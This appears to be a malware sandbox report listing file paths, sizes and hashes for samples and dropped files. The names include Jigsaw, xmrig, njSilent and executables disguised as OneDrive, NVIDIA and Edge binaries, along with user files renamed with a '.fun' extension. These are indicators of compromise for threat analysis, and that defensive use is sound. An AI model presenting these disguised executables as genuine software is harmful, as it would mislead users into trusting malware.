SHA1f5cc3af85ab27c3ea2c2f7cbb8295b28a76a459e
SHA256a193ee2673e0ba5ebc5ea6e65665b8a28bd7611f06d2b0174ec2076e22d94356
SHA5127d380cda12b342a770def9d4e9c078c97874f3a30cd9f531355e3744a8fef2308f79878ffeb12ce26953325cb6a17bc7e54237dfdc2ee72b140ec295676adbcb
-
Filesize
11.3MB
MD589d9527f0a0dee03a03b82ee9e5970ac
SHA18954423f287c61b6762e3c7646c25035cd0ac3d2
SHA256c51289c49ea88eae719f69ebe2d85f30993d8c7af297e1f47149e96b431a046e
SHA51242f95eced4f002e2e5f10fd8507f706277a7d9f057bdcb6c867db18bbba0ca28f035a55373c5a483d22bbec6f3371b21566fc92f2d8419be0d3dbf9ff264161f
-
Filesize
160B
MD5580ee0344b7da2786da6a433a1e84893
SHA160f8c4dd5457e9834f5402cb326b1a2d3ca0ba7e
SHA25698b6c2ddfefc628d03ceaef9d69688674a6bc32eb707f9ed86bc8c75675c4513
SHA512356d2cdea3321e894b5b46ad1ea24c0e3c8be8e3c454b5bd300b7340cbb454e71fc89ca09ea0785b373b483e67c2f6f6bb408e489b0de4ff82d5ed69a75613ba
-
Filesize
80B
MD5df4eb46b2f8c6d55092e768f2ff6cc24
SHA1e1975a57d056aa72ae349f8412de8b62583e919f
SHA25685e761e8c7140211840316308f144a3be3481ab1e034ce1f0fab8e99d81440aa
SHA5126492cab9d46205a2f43ad5dcb1690836a53604dcea8a7ecb31e83e16afc1f617d34c005fd9bff5ea092a29e46e6bbb8fbdd75ae88f4b4042bba525daacb39c7b
-
Filesize
324B
MD537243fbd71808e1b708aa3cda14abfee
SHA15342700ab7589462df9fcce67295a27d564d8736
SHA25671a28ab26bb151b610eb30b6cca1c0e55e700092a3853260c74cacc05b9128de
SHA512069472f6ee208dc303cfd2adeba706c054731a4a89bd5847f8b16c02f6f9fa3589aa25c29149819cf562502a702c8224a66778d5c26f8c81cd8054c8388bf3dc
-
Filesize
394B
MD53910d97b800d7ca6f66d096ca5d88b33
SHA1d6d467abd9232048de736f6b665b7d06b0202b72
SHA2563b719877b49b4294887d36602930c7b91cbb47fc1c559de5a818a1dabd28f62c
SHA512f565bd0860c8de781b57c5236fa59ff1023e70e7a2db532742432e1dc168adeec18f6eb5b644e5ac189f0d993bb7bc194bf5bfe87f9ee699344dd5e5d83f4dc3
-
Filesize
1KB
MD5baf55b95da4a601229647f25dad12878
SHA1abc16954ebfd213733c4493fc1910164d825cac8
SHA256ee954c5d8156fd8890e582c716e5758ed9b33721258f10e758bdc31ccbcb1924
SHA51224f502fedb1a305d0d7b08857ffc1db9b2359ff34e06d5748ecc84e35c985f29a20d9f0a533bea32d234ab37097ec0481620c63b14ac89b280e75e14d19fd545
-
Filesize
2KB
MD5968cb9309758126772781b83adb8a28f
SHA18da30e71accf186b2ba11da1797cf67f8f78b47c
SHA25692099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
SHA5124bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3
-
Filesize
152B
MD5f426165d1e5f7df1b7a3758c306cd4ae
SHA159ef728fbbb5c4197600f61daec48556fec651c1
SHA256b68dfc21866d0abe5c75d70acc54670421fa9b26baf98af852768676a901b841
SHA5128d437fcb85acb0705bf080141e7a021740901248985a76299ea8c43e46ad78fb88c738322cf302f6a550caa5e79d85b36827e9b329b1094521b17cf638c015b6
-
Filesize
152B
MD56960857d16aadfa79d36df8ebbf0e423
SHA1e1db43bd478274366621a8c6497e270d46c6ed4f
SHA256f40b812ce44e391423eb66602ac0af138a1e948aa8c4116045fef671ef21cd32
SHA5126deb2a63055a643759dd0ae125fb2f68ec04a443dbf8b066a812b42352bbcfa4517382ed0910c190c986a864559c3453c772e153ee2e9432fb2de2e1e49ca7fe
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
Filesize936B
MD5f167b80cc763b52005aa31c66b9ddd8f
SHA16bd13ec9c022c34caa75ad5e8c2cd003868ac406
SHA2567dca5b571b6e5a8cbc9d57964031680a108c12c5166a89edcd1c7e602891ce80
SHA512e3799edb4663f7240de2c433ad5295367fc05b9e0f707c127bcd42d92c75c097c8962a25511a321225c979b828aaf068ddb45d168ceb6989008197fcf63a5b5f
-
Filesize
264KB
MD5f50f89a0a91564d0b8a211f8921aa7de
SHA1112403a17dd69d5b9018b8cede023cb3b54eab7d
SHA256b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec
SHA512bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58
-
Filesize
111B
MD5807419ca9a4734feaf8d8563a003b048
SHA1a723c7d60a65886ffa068711f1e900ccc85922a6
SHA256aa10bf07b0d265bed28f2a475f3564d8ddb5e4d4ffee0ab6f3a0cc564907b631
SHA512f10d496ae75db5ba412bd9f17bf0c7da7632db92a3fabf7f24071e40f5759c6a875ad8f3a72bad149da58b3da3b816077df125d0d9f3544adba68c66353d206c
-
Filesize
402B
MD560026d2750ff9ba67845f8b4d741b61f
SHA1832c27be07515022bd6e5ce62255d605818f3cc3
SHA256841d057056c244a0990008271830edc754e4f18231d12913b640bd32851b3507
SHA512c6f539ac83f3f8aa919e38c2877ce5499d9c8fba3a3f135f951d04e197b4a2c86341ca4579a36e409d663dcb736ee92901d728d73b7e93d00841dc26e530b969
-
Filesize
5KB
MD5cd4627eb7152f9af67546d323674d6c6
SHA1a2ae4becb636d725aaa5d90579e1ed128aed6be3
SHA256214678f61eda973bcf1c3338628d18ea0d4cf62e6a786fc788be94b2ef61695b
SHA51284617638ee993c3f7a79d5a271783bae3d1cd196836f7f45cf698c7c096e3af944b4489849992e6d1538305ebd70c7ce5dea644e150f214a755b4534fc90c54c
-
Filesize
6KB
MD59c1e3fa4ecdca98230240d7f8c082ee1
SHA154fd2cd7250c63c03327388fdcd0914048db2423
SHA2569b8c79a3a80ad72762baf2726684ea1ff67200b5ad639b1b7533b0dd64862d18
SHA512abe590dd54f607962e9e8c3ec4ae2069edc9af319349506479464ea4fbfed74637373278955e39b2adb7befe007ef41746e2e6ad1c907b4f8953d49e80464094
-
Filesize
6KB
MD532b842157ddf8ea65eed49d85e32a7ab
SHA192de4aa5976f762ec77fc179c7397edf3650b10d
SHA256bc8dc8fbf28cb50687addda074baeb59ab7c5bb4cfb3e9805eaba2b5353925ef
SHA5123876583a35bdd7ac503ab0c30f162f439d4a518e98e119f54d55dcbcb60550ebb6c3c9d841bdab12a6e3e90f1a432f367cace277851fcccc306145a4d8d48104
-
Filesize
6KB
MD5d0f2bc145f11796a98862d98de32cb58
SHA1a9678eff5c968f87ab727ef4f33fe448ca6dbca4
SHA256230094be18f1d8977191743d9d30785e79c2c31bdad99f7af0a2a6b790714888
SHA512d9563e203be2284e526ae38540da8e5b6ea73328f32886a8f97819dc99dd27f053e7478dfa1f91b799a9940ceca92a0b7a4ade1f546a255495a5c7179d7f76d0
-
Filesize
16B
MD56752a1d65b201c13b62ea44016eb221f
SHA158ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA2560861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA5129cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389
-
Filesize
10KB
MD53d5a0a22d34fa5ee0fb6bd11013a9ed0
SHA14fa5109ce13a9b22f648eaefb52c7654fc21287b
SHA2565884261281461834acf29a10abd2f37aa61a0ca367842a2cc0a842878bd9c79f
SHA5129a52cb8e64d54434abc3e3a7c981650b9f24a741f2ba1b1a4c6cd74a8fee085073bfa1fb6c4e9cb87745fd3ce9ba051b9d7b3dd0b82ed19f8405a80aea18630c
-
Filesize
10KB
MD5573c96ba30c9bd385c1fad8d0cfea209
SHA1e9451c3f3ec64f64d7bbbeb9759e900c5fb72d97
SHA256833613b35c3fc4c2ad0272cff13c459c6e6031975e569c95e819fe58f9213af3
SHA512657b146a8864519c1c0c82733fa46ef875c5baf46a6c8c641fc01703e31ecf943747c32590a02a3817e0cd9d68cfd3a5ce48b8781e05de3dc07e9092111b76fb
-
Filesize
10KB
MD53a0ccbf3edfc98486ab5f9611615e334
SHA11ef8da8b08a7d2b0cc873a60226c35fff0621bb2
SHA256d35bf87f6540deaaacd793845641e6925ac50a694243179290347f7ffaae73a7
SHA512cc32225ab151d700f5554b1459c3e1d537af59801c23875c53b2bea543c521d383ab9594a08cf7d91415ca618c0dae40bcf4a350d73b22541ecfcd4d90396fcc
-
Filesize
16KB
MD5bf051ff9f1069d226a4b9871fc758ccc
SHA12fdf5b6c832c0062651422789a6718af94b79975
SHA2561401056c93f811bf6c0c74bb1da2c606a95c782582b3f20ec8070b3b0bfe8a98
SHA512df07c3e0319c12290bdffa4418928f0c09549dccde847e84ac61d8fdb2f34790e01c4aea56c24dacf20cd6472392387e3254c7873b0888838a4a5e4256d87a33
-
Filesize
16KB
MD5d4cc64d66c3bb66020e8da96d2d7cb51
SHA114dd0c55912ba8d5023bd80eccea0570ce275cd1
SHA256d17e64877bcd34ce7f4dd08f2a383b1d24352f7c4f2751d427563c27cd087f0d
SHA512ae0d8982fcf358f0076980d40e34240ec90396256eceeb1fdfe2438747ecba1378301f03b1ab0a697cfac18ebbbadf3d945a4f563108f384d4d06b3481909e4d
-
Filesize
18KB
MD54b9fd22549f1f7aee4d22e75fbe22d88
SHA19baf0ec553a9e7d7220f2d712d30a2a6fcc3d332
SHA256de74f6ab6fcf0f859c31a4966e098dbd18cd39cf200570d90bb3c9f5f19321b7
SHA5127de84fd6babced20aa9c594c0dd2aa6021fcf2d65ee8f3a0403f1cccc1732a28a32bdbed8061d792f30b2d4f2cdba2fae9d6a7c320a371945854dd584c9e3a3a
-
C:\Users\Admin\AppData\Local\Packages\Microsoft.AccountsControl_cw5n1h2txyewy\Settings\settings.dat.fun
Filesize8KB
MD5f22599af9343cac74a6c5412104d748c
SHA1e2ac4c57fa38f9d99f3d38c2f6582b4334331df5
SHA25636537e56d60910ab6aa548e64ca4adafdcabde9d60739013993e12ba061dfd65
SHA5125c8afc025e1d8342d93b7842dc7ef22eca61085857a80a08ba9b3f156ee3b814606bb32bc244bd525a7913e7915bdf3a86771d39577f4a1176ade04dc381c6d4
-
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133727662661366456.txt.fun
Filesize77KB
MD5653eff8bad834c4c3bcb673cdcdd894c
SHA1f6545f2a88d572c759e8b8ebf1b55d5e06ed80ca
SHA25690db426010c755a7cddd0dff10fbfd06b8fb2c71a8fe4b7b003ac820fe61a84d
SHA512fd7a4b7efc7184510060e94acd5f877d18eb03a33dbb481cd95030c7263112f91becd6fbd9921faed9fa586512f5d44379a8e3c040ec6fe5d26dbf7cd5a74b51
-
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133727664305265042.txt.fun
Filesize47KB
MD59445a004b034d04ad52da34823263511
SHA1c322862db0094359fb272d1c90d5158ea26a032a
SHA256a94334d04a574d8bb9427c7bab51e37b5d2dd7c8e8edde4ba746989c66acd891
SHA512bfb9e07e12e04951deb52f452f2552bbf8be7993cf89544bbdeacbb55d333887e9452abc46cd8a42e10198d327e25aa29227c2c352790bcfb0263795366a2382
-
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133727669875215309.txt.fun
Filesize65KB
MD5ba2bbe2cda90e55b7457b8c6d6db9d1a
SHA1e4742f659fd4453bf11ef860c06095944747f9bf
SHA2565ef6411e9b665dc62915e501e7c9c83e959b37fb848b19c220a0a3626217c394
SHA5124b87ceff65e205e1e0bca7dbf0bec88ca478ff9ad2510e4b7079cdf4dbae762f310de52a4584e707a972c0a365570b4c4e1fbb98368562515ee6db9fd19628ff
-
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133801545744166721.txt.fun
Filesize75KB
MD5b6d16cae56966fcdf761b1a644888f5c
SHA1fc840847f2f6112dfd4343806cdd7bdf2ccab74e
SHA256676fd90fbdd97e28b407ca0549e35bf5e7af67967fbd1444db66c7879e99eb94
SHA512abfbded1fcce2247ef656810dc32e5443f4d72da927d845191d6273d7d8aba6bcfbe521ee1d735bd640d7102aad0c18a2ab657da931a0e37cb62d0642b79d22b
-
Filesize
6.9MB
MD5b9a0cf1020dcdb5626c3360003456ab0
SHA1d21946d5f6b448659c65f17eeae504ef1cae32d3
SHA256396dcfdfa4b2bc2f01f2e0d68f31eb0713b3912ed36f4c3d39fcb3156a62fbfa
SHA512bc2d9dfe8278fab426f2aca3f5f9a89c1295558365cbe2ef54728d40ff8910e1893aa274d9c85eb1c6f134f7bec27842d61f27b0192ca990946e8c3caa5149a7
-
Filesize
48KB
MD5349e6eb110e34a08924d92f6b334801d
SHA1bdfb289daff51890cc71697b6322aa4b35ec9169
SHA256c9fd7be4579e4aa942e8c2b44ab10115fa6c2fe6afd0c584865413d9d53f3b2a
SHA5122a635b815a5e117ea181ee79305ee1baf591459427acc5210d8c6c7e447be3513ead871c605eb3d32e4ab4111b2a335f26520d0ef8c1245a4af44e1faec44574
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
2.5MB
MD5cc23600e896342e8d4086178b2f57b2f
SHA18588238e481bfabcd8d832ff1e06ff05ee9afd4b
SHA256de28354336aff91e295da45fc95d80ccdee6f1f6d0e552699e376db906551614
SHA5124e7ebfd51e2cd30c336ca21ef9fc3318abab72a1aaedead5fc1de750ef3e63e20b11adac9a1a5a786a77f30ec257c0c36736944896cd6ce4d3f0ae6afff7b10c
-
Filesize
1KB
MD5cc69ad5f2e158bc9301f55146c738937
SHA13e6a637d1b649b0117691604adfbb8faa2cf247a
SHA256f26467c82dffc3cf22f1e598d4d00739c2729e22cabf0ebc70c2e28132ac51b9
SHA5122fef929a63987a56d27f42ad73b950a021e44d5800e7b0fd34f4ede7c98340ee6e0adc087ace650576d8b591609f574c85e983651ab3f4d8e74a4dc00d55a681
-
Filesize
16B
MD58ebcc5ca5ac09a09376801ecdd6f3792
SHA181187142b138e0245d5d0bc511f7c46c30df3e14
SHA256619e246fc0ac11320ff9e322a979948d949494b0c18217f4d794e1b398818880
SHA512cec50bfc6ad2f57f16da99459f40f2d424c6d5691685fa1053284f46c8c8c8a975d7bcb1f3521c4f3fbdc310cf4714e29404aa23be6021e2e267c97b090dc650
-
Filesize
12KB
MD594fe78dc42e3403d06477f995770733c
SHA1ea6ba4a14bab2a976d62ea7ddd4940ec90560586
SHA25616930620b3b9166e0ffbd98f5d5b580c9919fd6ccdcc74fb996f53577f508267
SHA512add85726e7d2c69068381688fe84defe820f600e6214eff029042e3002e9f4ad52dde3b8bb28f4148cca1b950cd54d3999ce9e8445c4562d1ef2efdb1c6bdeff
-
Filesize
4KB
MD5202786d1d9b71c375e6f940e6dd4828a
SHA17cad95faa33e92aceee3bcc809cd687bda650d74
SHA25645930e1ff487557dd242214c1e7d07294dbedfa7bc2cf712fae46d8d6b61de76
SHA512de81012a38c1933a82cb39f1ac5261e7af8df80c8478ed540111fe84a6f150f0595889b0e087889894187559f61e1142d7e4971d05bceb737ed06f13726e7eae
-
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\4363463463464363463463463.exe
Filesize10KB
MD52a94f3960c58c6e70826495f76d00b85
SHA1e2a1a5641295f5ebf01a37ac1c170ac0814bb71a
SHA2562fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce
SHA512fbf55b55fcfb12eb8c029562956229208b9e8e2591859d6336c28a590c92a4d0f7033a77c46ef6ebe07ddfca353aba1e84b51907cd774beab148ee901c92d62f
-
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\Client-built.exe
Filesize3.1MB
MD58cadd9d05b28bdf0f3caeed0ce516d9c
SHA1b6b04039117acc2ffaef424eeaf6d99b4086487f
SHA2567fc8b932158ef8ced6bebf0c254f96cd6cd4cd1a0fd3a90e54652768c477aaf7
SHA5122e1c01240ac20ac2a374926893fa4796d4f4daa8f479c1c55ad62791ca0cb32cc8baf192d849abefc9c1a88d69045f4aeb563105d5d54fcac049b3b8f2ba7fee
-
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\H8hsp6zrMtJI2hC.exe
Filesize1022KB
MD5d0c3ffc810e533715b61807e6bafae7f
SHA181fbbe0e0e57b1f44b3e5689e48fcf6cceced4e2
SHA2568dfdaaecfa4a530b2828a88e10859aab01ef8ec3072b623ce878d123e657adab
SHA512ab64477eaab6fb755e8ca1a0c0a171e5f69572574495a4af0261c8420009981900d32ad93f8bad3e2be595638a261832a135af4ed513c07f7e1a7b4d5684c18c
-
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\Jigsaw.exe
Filesize283KB
MD52773e3dc59472296cb0024ba7715a64e
SHA127d99fbca067f478bb91cdbcb92f13a828b00859
SHA2563ae96f73d805e1d3995253db4d910300d8442ea603737a1428b613061e7f61e7
SHA5126ef530b209f8ec459cca66dbf2c31ec96c5f7d609f17fa3b877d276968032fbc6132ea4a45ed1450fb6c5d730a7c9349bf4481e28befaea6b119ec0ded842262
-
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\NVIDIA.exe
Filesize10KB
MD53da09b942edac59bc7a540bc822e3442
SHA11dae7e12435d70649f4fbf949426f8c98bdbeae8
SHA256aa6f15888d7e42537c6c02ebc6d27f4e8d295f853d6dde864cac30b30852df65
SHA512e0480de61d73c1edd7e3e6fa88c625cec673726c8da27760dac18c097beb7c61c11063d7487ed187ba5d6050491257a99769895d53c4362bd1f242438653113b
-
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\SrbijaSetupHokej.exe
Filesize4.5MB
MD5528b9a26fd19839aeba788171c568311
SHA18276a9db275dccad133cc7d48cf0b8d97b91f1e2
SHA256f84477a25b3fd48faf72484d4d9f86a4152b07baf5bc743656451fe36df2d482
SHA512255baefe30d50c9cd35654820f0aa59daccd324b631cc1b10a3d906b489f431bba71836bb0558a81df262b49fb893ca26e0029cca6e2c961f907aac2462da438
-
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\msedge..exe
Filesize66KB
MD57f7a3dc4765e86e7f2c06e42fa8cd1aa
SHA17e53565f05406060ad0767fee6c25d88169eeb83
SHA256b80255cba447ef8bab084763b3836776c42158673e386159df71862bf583c126
SHA512e9fa71e004c76d01ad125103c0675d677a6e05b1c3df4ba5c78bd9bc5454a6bd22cdd7ab5de26d77cdeb4a3865aec1db7fc080bca7e16deb7bf61c31300c6671
-
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\njSilent.exe
Filesize37KB
MD5e20a459e155e9860e8a00f4d4a6015bf
SHA1982fe6b24779fa4a64a154947aca4d5615a7af86
SHA256d6ee68c0057fd95a29a2f112c19cb556837eff859071827bc5d37069742d96cc
SHA512381a3c27328e30a06125c2fa45334ca84aaff7904afb032e4fd6dec1474179787f0d87e93804b7b79e74987e2977ea19d64de05872c7f4fe1ca818199ed30d02
-
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\stub.exe
Filesize11.6MB
MD56a38e035957d63a6478ffade82713be2
SHA19ed386b5d7b40937e6db0c7351513db28f39ff9b
SHA2564e50e4ad5189d7e410eb1bdcce73f0ecdfd4f566a2c71fe7852214904659d30b
SHA512b50c070b313e1f198a9ea5f44bcdc50e5b85a1dd8e2b066c3209481cd7420fae61ecffb72a3b1a2dbc102a1b6028c15dbfe699ead486441f97b43cafed1d6726
-
Filesize
7KB
MD5a7b1b22096cf2b8b9a0156216871768a
SHA148acafe87df586a0434459b068d9323d20f904cb
SHA25682fbb67bf03714661b75a49245c8fe42141e7b68dda3f97f765eb1f2e00a89a9
SHA51235b3c89b18135e3aca482b376f5013557db636a332a18c4b43d34d3983e5d070a926c95e40966fafea1d54569b9e3c4ab483eaca81b015724d42db24b5f3805f
-
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\New Text Document mod.exe
Filesize8KB
MD569994ff2f00eeca9335ccd502198e05b
SHA1b13a15a5bea65b711b835ce8eccd2a699a99cead
SHA2562e2e035ece4accdee838ecaacdc263fa526939597954d18d1320d73c8bf810c2
SHA512ced53147894ed2dfc980bcb50767d9734ba8021f85842a53bb4bb4c502d51b4e9884f5f74c4dd2b70b53cafbe2441376675f7bd0f19bb20a3becb091a34fb9f3
-
Filesize
4.2MB
MD5781da1c06e074c6dfbb0c6b797df9eb7
SHA138e79b6ea79d430c6858a976afb0bb60a5aa3320
SHA2569888ce35d905f7a831dd0ff96757c45c6bd7adea987720b05141f3522c480b18
SHA51269df833452ea77393c54ffa449dc625720ac0fb449a3ee1da20d867c208555edf5845076ea00dc5a6d05254cf87fdd39fed12e33d3c6f726ba2e42060a9c2b3e
-
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\02.08.2022.exe
Filesize242KB
MD58f6eef497307fd7c7f8851b591e41a8c
SHA1457d0c1b0cd1944205762e599123871ca403db7a
SHA256793b05aa9a785109d45eaec15d4110cf624af1ccb683b91f7131369a87e93ea5
SHA512f2b74e90009592a2ece408e3db280014dddeb51152fd57681020a17eefedbcea8984fde76e71ea552723c10586ed4d83518878376f808842d71d71ed77d79768
-
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\Bootxr.exe
Filesize204KB
MD5cab92c144fd667cef7315c451bed854b
SHA1532ec7af97764480129b12f75f9f8c1eeb570cb8
SHA25649f94ed44fa9a834f246a5a038aa971b26f928d32ed438faacccba2398753297
SHA51218bb1aed2020f3a0e65c64e29ef122dc8c8f870409eaff22277c306682d96fb331ae44f87aee34f5e21ff1f05cb856d0376f2012944c893609596e39e8457c43
-
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\diskutil.exe
Filesize3.2MB
MD564037f2d91fe82b3cf5300d6fa6d21c3
SHA161c8649b92fc06db644616af549ff5513f0f0a6d
SHA25633aab91831bba3a5fea7f49da16d5506254d66377d3074ff9457af4220be670e
SHA5122a70ef0c4d3a2237175078f0e84cd35d7d595422c3aa5219d6f0fe876f82cf60e1d4f592a58f166cf8175c52d275c21950c5ea421416fee8877dfaec5b9be008
-
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\ghjaedjgaw.exe
Filesize144KB
MD51d0fb45faa5b7a8b398703596d67c967
SHA1b326e3801b56b5ed86ae66249e6ea64cdefa1997
SHA2564e0453e61609c04bce1071d29f21abc82800e11261e284ca3250fd8655239456
SHA5129fa97e8611fd837f0756a505b8615076187d77fcf8aa5ff802944879e9d4d19ebccaea394b0c4327748c73da6bfca8acba6cdf12c5992056a798f28c064e0a63
-
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\microsoft-onedrive.exe
Filesize9.5MB
MD559304e9a78243b260b3f04af007f62a5
SHA1f57e5be6bf1f7081bc74f7f2610ec35353a4faa0
SHA256c619f6d5019ed3fe466dfa66ef86013be1b9deec3770a2aee86c0789b5ae8f9e
SHA5128b552608e6815edd33a905729de412ed7a3c89c1f48e4395eea1dfef77a2396d16229903e68dd7279cc646ac24f978f58ec031d6f72c8f9e5f3552c8e4a74c48
-
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\systempreter.exe
Filesize52KB
MD5d07714b594ae5d7f674c7fcf6a803807
SHA1938efbba8d8e34c2d1dcc0db37a84f887ae6724f
SHA256ad8248e7dafb0a1b3d6c22dac544f0abcfab093a75561e534a473d46917f1d47
SHA512487306ea6bdd7e247c9b194eae6d1e22fe898161f6417eb773c84144584cfb96c4d47d188f38a349cee7b13887f3fdf81b5542ac914cfe072beb564899553250
-
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\uncrypted.exe
Filesize1004KB
MD584e8a17e39ef16dce73da924ced012d5
SHA1630f2eb6046e05450c10af2a4ae01840e0a19405
SHA256bebe3cadd1d51412d055ba11ebc64091c45e2ef47dbcc7135d2d762f26a466c2
SHA512637d28f7ecc48a606813301143c440f27a0de999284cad0df6467533a7440ac56cd343b7d99103f3d8bcddf952bfa4794003d8740a7b21090443aafa5fddf24c
-
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\xmrig.exe
Filesize9.1MB
MD5cb166d49ce846727ed70134b589b0142
SHA18f5e1c7792e9580f2b10d7bef6dc7e63ea044688
SHA25649da580656e51214d59702a1d983eff143af3560a344f524fe86326c53fb5ddb
SHA512a39bd86a148af26fd31a0d171078fb7bce0951bb8ea63658d87f6bde97dbc214c62e8bd7152d1e621051de8a0ba77ffd7bda7c1106afb740584c80e68e1912ed
-
Filesize
225KB
MD5687e1ca805cb61507f60a093516e31ab
SHA1eb059e0feb00ded26590a071adde38c2c30349ec
SHA2564ec25893b02eab89f189b9edb0a46850bb33fc1b9d98080a012bb55df8f72ab7
SHA5127e94943b090cc646469ee9238900ee5eff21c02459b11700f939959c609b4c99a661be9af62979dadf25343720be976db2677ad8bef3703df7e6e079ad0fb72c
-
Filesize
217KB
MD5dad6bec32b7a7483f3413a73890c6bae
SHA16fc0683a80cd0f809e7c8527556772e3264e166c
SHA2568f60ceb5d3283e83296011c84b4bb5ea71fb2c285f252c94b8fa019d4ee7906f
SHA51283af77e6a08a1b4f34de4fcc9604d7eefe728bb6fc5b16219fa72d41084ac565ef7fc392fa977ca8236d323e74db90488883122c6236eaa712491f7cb7d53148
-
Filesize
302KB
MD5211a9f01da52b2e54e9de57383f3a3ea
SHA1914524cc6ba767e34ed7f2ebe0db6c091af22b8a
SHA2560c7d0b72296ba296b9a9fe4510a89447270b3b66059daea0101706fc55896c9e
SHA512abbd4a6198d193c3030c0aa1a2500608bcbb30521c8806187cf6ce5185d5fc36fe5eed7ed8e3ed9c07c7a8fdcf2a9160920295b7960c0576d44f7f90adc1eed8
-
Filesize
166KB
MD589bdf0f9154910bac7f6a7a9c28d0bd7
SHA1742eeca4f6fde801c328e97018aafe5217d6ec4d
SHA256e821866caa42edc31cc541156650d45f5b251e46ab6d44a4fa5aea7b7f0c3d91
SHA512955d69425dbf8001869f8567cd4b0f7090fe289c57627471430abc0dfc19436c56e4579cba6fef70270df78a52f18b9a13777a9c8905657c14fe66d16e8cdb4d
-
Filesize
319KB
MD51ee0264370ad118064c30046239c8f02
SHA18466dcf5793042b1d0a9a0c053f0c6659d61d2a6
SHA25679ceccc17a0e2e6dd7eb88215ad9177ce59b652a79ae9663437cd9f1dd34acf4
SHA512dbe899c2ede0dd12a632f46d80e8873c16071a5b5fd8f387edd26054ae8934c6ebf074effd75e310396f1b8edaf2aa9f01fb2d1a35338847dc8efd8cae3f603e
-
Filesize
200KB
MD5fed1eeff5d29e43cda1c2fd356713cf9
SHA1a23e08cf92961281603231d676b6561972f2b681
SHA2563d905c9f13ff6a9ef7748807f449dc251a84061d067ea2cbfba9034750811769
SHA5127850cf3a0aa3f69a26c1f166d43f197bd1950b832f71ba8fbd5c2d3df15bcbb6c9b7623a9168ac5241adeab2070b2c184d3e4686f779a3240ce3303c56a3cef4
-
Filesize
294KB
MD57978019ff6c8260a6db215736f15d332
SHA158d9159e45dc726f57b2eaa710a7c7d187590a14
SHA25666edc7437ddfd9dcc4ba10f2a156a59c914e46b6f931b508102abe84fa2e778f
SHA512ea68c3c0e8b2bca1811e48a3a03344232080080ba8e20e4a363b6bd8833f499a644c510eadfa9558f2c311fa6ebeea1b556d4baa847c68e73ded1089b2b3353d
-
Filesize
485KB
MD543e4943a951e2f323e986d7507d18b82
SHA1dccb5280388b3d5739a83f4c44246fb6a96edb64
SHA2567607c42ac89d5aac29cc9c127d8416f6e9bc49e9ea0818869123f026f495d457
SHA5122a12bcaa5cc1d20dd1087d5bf8688212f00a8f32871282c89710f8f062152e8ad66fe7602d3e5ca930472886813b06198d8e1b9046c5aa1bcce57c3faaea92b1
-
Filesize
123KB
MD5c6219f2e3ec51378d5737a3cd966d7fd
SHA13112791729b978a267cdc1555f4f11ffa0806228
SHA256ec0d2bee97c72b96a08f06b73f9085501c49e330045ca5b56bb77f25bf5d744b
SHA5120ad2f39d5636ecff2ac284ebe611a0b1283facbeed59faa26cb0f4b9200784e3bb71a3eebfa450dffd7c3aef45617183b3261ef0d1a7eb5987385c140ca146fa
-
Filesize
234KB
MD55552cbf4b026432b003733457bfda57f
SHA124d5600b5c73f8e1b6f11031984d7a7434e555d1
